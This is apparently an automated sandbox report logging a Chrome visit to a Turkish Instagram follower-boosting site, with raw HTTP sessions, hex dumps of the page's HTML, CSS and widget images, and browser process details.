                    2024-05-26 22:58:39 UTC554INData Raw: 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 68 65 61 64 65 72 3a 3a 62 65 66 6f 72 65 2c 20 23 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 68 65 61 64 65 72 3a 3a 61 66 74 65 72 2c 20 23 6c 6f 67 67 65 64 41 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 68 65 61 64 65 72 3a 3a 62 65 66 6f 72 65 2c 20 23 6c 6f 67 67 65 64 41 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 68 65 61 64 65 72 3a 3a 61 66 74 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 09 09 09 7d 0a 0a 09 09 09 23 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61 6c 20 2e 6d 6f 64 61 6c 2d 63 6f 6e 74 65 6e 74 2c 20 23 6c 6f 67 67 65 64 41 6e 6e 6f 75 6e 63 65 6d 65 6e 74 4d 6f 64 61
                    Data Ascii: entModal .modal-header::before, #announcementModal .modal-header::after, #loggedAnnouncementModal .modal-header::before, #loggedAnnouncementModal .modal-header::after {display: none;}#announcementModal .modal-content, #loggedAnnouncementModa
                    2024-05-26 22:58:39 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    99192.168.2.549880104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:39 UTC789OUTGET /assets/logo/logo.png HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/blog
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764314.0.0.0; _ga=GA1.2.1095029423.1716764258
                    2024-05-26 22:58:39 UTC742INHTTP/1.1 404 Not Found
                    Date: Sun, 26 May 2024 22:58:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: BYPASS
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=znzzEAeD5JBHAefIWebRuSH%2BAu88IUyk9pzEg5LgLZwf2rqYh4Gh8LtfZtLq%2BafQq4LKq%2FO5M6iSHH2zOs1P7XqU6I0vRK530fzvkIDjXbZX%2Fc8xdPBHB6SXAKyHw0E%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15f067e4c19a1-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:39 UTC627INData Raw: 31 63 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 70 61
                    Data Ascii: 1c76<!DOCTYPE html><html lang="tr"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-pa
                    2024-05-26 22:58:39 UTC1369INData Raw: 73 2f 73 74 79 6c 65 2f 70 61 70 65 72 2e 63 73 73 3f 76 3d 76 33 2e 31 2e 35 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6e 70 72 6f 67 72 65 73 73 2f 6e 70 72 6f 67 72 65 73 73 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 61 73 73 65 74 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 7c 20 41 6e 61 54 61 6b 69 70 20 6b 65 6e 64 69 6e 69 7a 69 20 69 6e 73 74 61 67 72 61 6d 20 65 6e 20 69 79 69 20 70 72 6f 66 69 6c 69 20 68 61 6c 69 6e 65 20 67 65 74 69 72 69 6e
                    Data Ascii: s/style/paper.css?v=v3.1.5"><link rel="stylesheet" href="/assets/nprogress/nprogress.css"><link rel="shortcut icon" href="/assets/logo/favicon.png" type="image/x-icon" /><title>Page Not Found | AnaTakip kendinizi instagram en iyi profili haline getirin
                    2024-05-26 22:58:39 UTC1369INData Raw: 63 6f 6c 6c 61 70 73 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 54 6f 67 67 6c 65 20 6e 61 76 69 67 61 74 69 6f 6e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 62 61 72 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 6c 65 66 74 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76
                    Data Ascii: collapse" aria-expanded="false"><span class="sr-only">Toggle navigation</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button></div><div class="navbar-collapse collapse navbar-left"><ul class="nav
                    2024-05-26 22:58:39 UTC1369INData Raw: 3c 68 35 3e 4b 69 6d 6c 65 72 20 4b 75 6c 6c 61 6e 61 62 69 6c 69 72 3c 2f 68 35 3e 0a 3c 70 3e 49 6e 73 74 61 67 72 61 6d 20 c3 bc 79 65 6c 69 c4 9f 69 20 6f 6c 61 6e 20 68 65 72 6b 65 73 20 73 69 73 74 65 6d 69 20 6b 75 6c 6c 61 6e 61 62 69 6c 69 72 2e 20 49 6e 73 74 61 67 72 61 6d 20 68 65 73 61 62 c4 b1 6e c4 b1 7a 6c 61 20 67 69 72 69 c5 9f 20 79 61 70 c4 b1 6e 20 76 65 20 68 65 6d 65 6e 20 6b 75 6c 6c 61 6e 6d 61 79 61 20 62 61 c5 9f 6c 61 79 c4 b1 6e 2e 20 4b 75 6c 6c 61 6e c4 b1 6d 20 c3 bc 63 72 65 74 73 69 7a 64 69 72 2e 20 4b 72 65 64 69 20 73 61 74 c4 b1 6e 20 61 6c 6d 61 64 c4 b1 6b c3 a7 61 20 68 69 c3 a7 62 69 72 20 c3 bc 63 72 65 74 20 c3 b6 64 65 6d 65 7a 73 69 6e 69 7a 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73
                    Data Ascii: <h5>Kimler Kullanabilir</h5><p>Instagram yelii olan herkes sistemi kullanabilir. Instagram hesabnzla giri yapn ve hemen kullanmaya balayn. Kullanm cretsizdir. Kredi satn almadka hibir cret demezsiniz.</p></div><div class
                    2024-05-26 22:58:39 UTC1369INData Raw: 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 63 6f 72 65 2f 63 6f 72 65 2e 6a 73 3f 76 3d 33 2e 31 2e 31 30 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 09 09 09 28 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 73 2c 20 6f 2c 20 67 2c 20 72 2c 20 61 2c 20 6d 29 20 7b 0a 09 09 09 09 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 72 3b 0a 09 09 09 09 69 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 28 69 5b 72 5d 2e 71 20 3d 20 69 5b 72 5d 2e 71 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 0a 09 09 09 09 7d 2c 20 69 5b 72 5d
                    Data Ascii: pt><script src="/assets/core/core.js?v=3.1.10"></script><script type="text/javascript">(function (i, s, o, g, r, a, m) {i['GoogleAnalyticsObject'] = r;i[r] = i[r] || function () {(i[r].q = i[r].q || []).push(arguments)}, i[r]


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    100192.168.2.549882104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:40 UTC589OUTGET /widget/instamark.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:40 UTC373INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:58:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/14/1453.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15f0a8f6442e7-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:40 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    101192.168.2.549883104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:40 UTC589OUTGET /widget/anatakipx.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:40 UTC371INHTTP/1.1 307 Temporary Redirect
                    Date: Sun, 26 May 2024 22:58:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: no-cache, no-store, must-revalidate
                    location: https://widgets.amung.us/classic/00/55.png
                    CF-Cache-Status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 88a15f0acec31839-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:58:40 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    102192.168.2.549886104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:41 UTC591OUTGET /classic/14/1453.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: image
                    Referer: https://anatakip.com/
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:41 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:41 GMT
                    Content-Type: image/png
                    Content-Length: 1693
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-69d"
                    expires: Wed, 15 May 2024 21:02:08 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1043793
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15f0f3aa30f74-EWR
                    2024-05-26 22:58:41 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 d9 50 4c 54 45 ff ff ff bf bf bf 88 88 88 c6 c6 c6 ac ac ac e3 e3 e3 bb bb bb d4 d4 d4 be be be 7d 7d 7d 77 77 77 b9 b9 b9 b7 b7 b7 e7 e7 e7 74 74 74 e4 e4 e4 ae ae ae c9 c9 c9 8e 8e 8e 99 99 99 d6 d6 d6 ea ea ea 80 80 80 95 95 95 d3 d3 d3 e9 e9 e9 7a 7a 7a d1 d1 d1 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f
                    Data Ascii: PNGIHDRQpPLTE}}}wwwtttzzzvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;
                    2024-05-26 22:58:41 UTC756INData Raw: a7 ad b2 7c 60 a4 18 0e d9 9c 68 eb 39 47 56 e4 5c f2 62 74 de 6e ca 66 be 1f 71 93 18 be 2d bb 39 2e 56 d5 a0 ba f3 66 6a dd ae 7f 14 fb 5e 31 3f 3e af 1d a3 ba 0b 26 e2 8d 95 b7 88 63 67 de 67 d1 14 90 31 20 dd d4 54 46 0e 4b 03 62 89 27 48 d1 32 96 c9 a0 c3 b2 23 18 39 8f f8 fd fe 49 b3 6f 53 db fd 7e 9a a6 2e f7 cb f8 34 80 fe fe 26 fa 03 4f 53 1c a4 c5 c4 c4 d0 d3 38 92 63 62 21 8d 4e af d4 60 b4 bf d2 e5 f5 fe f9 2f f5 c5 c2 1d f3 58 f1 f5 48 2f 55 a5 d7 f7 83 a7 bd 4d e8 7b b0 d4 1e da 07 4f 7b c8 ed b9 3a f2 1e eb 8e 8b 13 1a a8 3d a2 28 fe c0 aa 86 b7 44 4a a7 b7 8b a0 13 43 e9 20 49 d4 d8 45 31 89 e4 e0 a9 86 e5 1c f2 1e ad 17 2e 4b 87 ef 10 33 a4 8d 92 24 97 77 36 49 2a e8 2b 85 ea de 8d 0c b5 92 14 0d ed fa 6a a3 95 a1 16 ba c9 05 cf 63 24 1c
                    Data Ascii: |`h9GV\btnfq-9.Vfj^1?>&cgg1 TFKb'H2#9IoS~.4&OS8cb!N`/XH/UM{O{:=(DJC IE1.K3$w6I*+jc$


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    103192.168.2.549887104.22.74.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:58:41 UTC359OUTGET /classic/14/1453.png HTTP/1.1
                    Host: widgets.amung.us
                    Connection: keep-alive
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: */*
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:58:41 UTC432INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:58:41 GMT
                    Content-Type: image/png
                    Content-Length: 1693
                    Connection: close
                    last-modified: Sun, 13 Jun 2010 09:03:11 GMT
                    etag: "4c149ecf-69d"
                    expires: Wed, 15 May 2024 21:02:08 GMT
                    Cache-Control: max-age=2678400
                    access-control-allow-origin: *
                    alt-svc: h3=":443"; ma=86400
                    CF-Cache-Status: HIT
                    Age: 1043793
                    Accept-Ranges: bytes
                    Server: cloudflare
                    CF-RAY: 88a15f136a1d41c6-EWR
                    2024-05-26 22:58:41 UTC937INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 51 00 00 00 1d 08 03 00 00 00 e5 cb 70 13 00 00 02 d9 50 4c 54 45 ff ff ff bf bf bf 88 88 88 c6 c6 c6 ac ac ac e3 e3 e3 bb bb bb d4 d4 d4 be be be 7d 7d 7d 77 77 77 b9 b9 b9 b7 b7 b7 e7 e7 e7 74 74 74 e4 e4 e4 ae ae ae c9 c9 c9 8e 8e 8e 99 99 99 d6 d6 d6 ea ea ea 80 80 80 95 95 95 d3 d3 d3 e9 e9 e9 7a 7a 7a d1 d1 d1 e1 e1 e1 c7 c7 c7 76 76 76 72 72 72 e2 e2 e2 90 90 90 92 92 92 93 93 93 a5 a5 a5 ad ad ad aa aa aa a8 a8 a8 a6 a6 a6 a4 a4 a4 8d 8d 8d e8 e8 e8 a2 a2 a2 d0 d0 d0 70 70 70 cf cf cf a0 a0 a0 ff ff ff 5c 5c 5c 28 28 28 0c 0c 0c 35 35 35 c1 27 2d 08 08 08 30 30 30 05 05 05 02 02 02 45 45 45 38 38 38 10 10 10 2d 2d 2d 41 41 41 51 51 51 3d 3d 3d 7d 27 2a 68 24 27 58 58 58 b6 26 2c 88 37 3b 7f
                    Data Ascii: PNGIHDRQpPLTE}}}wwwtttzzzvvvrrrppp\\\(((555'-000EEE888---AAAQQQ===}'*h$'XXX&,7;
                    2024-05-26 22:58:41 UTC756INData Raw: a7 ad b2 7c 60 a4 18 0e d9 9c 68 eb 39 47 56 e4 5c f2 62 74 de 6e ca 66 be 1f 71 93 18 be 2d bb 39 2e 56 d5 a0 ba f3 66 6a dd ae 7f 14 fb 5e 31 3f 3e af 1d a3 ba 0b 26 e2 8d 95 b7 88 63 67 de 67 d1 14 90 31 20 dd d4 54 46 0e 4b 03 62 89 27 48 d1 32 96 c9 a0 c3 b2 23 18 39 8f f8 fd fe 49 b3 6f 53 db fd 7e 9a a6 2e f7 cb f8 34 80 fe fe 26 fa 03 4f 53 1c a4 c5 c4 c4 d0 d3 38 92 63 62 21 8d 4e af d4 60 b4 bf d2 e5 f5 fe f9 2f f5 c5 c2 1d f3 58 f1 f5 48 2f 55 a5 d7 f7 83 a7 bd 4d e8 7b b0 d4 1e da 07 4f 7b c8 ed b9 3a f2 1e eb 8e 8b 13 1a a8 3d a2 28 fe c0 aa 86 b7 44 4a a7 b7 8b a0 13 43 e9 20 49 d4 d8 45 31 89 e4 e0 a9 86 e5 1c f2 1e ad 17 2e 4b 87 ef 10 33 a4 8d 92 24 97 77 36 49 2a e8 2b 85 ea de 8d 0c b5 92 14 0d ed fa 6a a3 95 a1 16 ba c9 05 cf 63 24 1c
                    Data Ascii: |`h9GV\btnfq-9.Vfj^1?>&cgg1 TFKb'H2#9IoS~.4&OS8cb!N`/XH/UM{O{:=(DJC IE1.K3$w6I*+jc$


                    Click to jump to process

                    Click to jump to process

                    Click to jump to process

                    Target ID:0
                    Start time:18:57:20
                    Start date:26/05/2024
                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                    Imagebase:0x7ff715980000
                    File size:3'242'272 bytes
                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:false

                    Target ID:2
                    Start time:18:57:24
                    Start date:26/05/2024
                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2180,i,14791946737678668430,15849109549246575421,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                    Imagebase:0x7ff715980000
                    File size:3'242'272 bytes
                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:false

                    Target ID:3
                    Start time:18:57:27
                    Start date:26/05/2024
                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://instahilecin.net/"
                    Imagebase:0x7ff715980000
                    File size:3'242'272 bytes
                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    No disassembly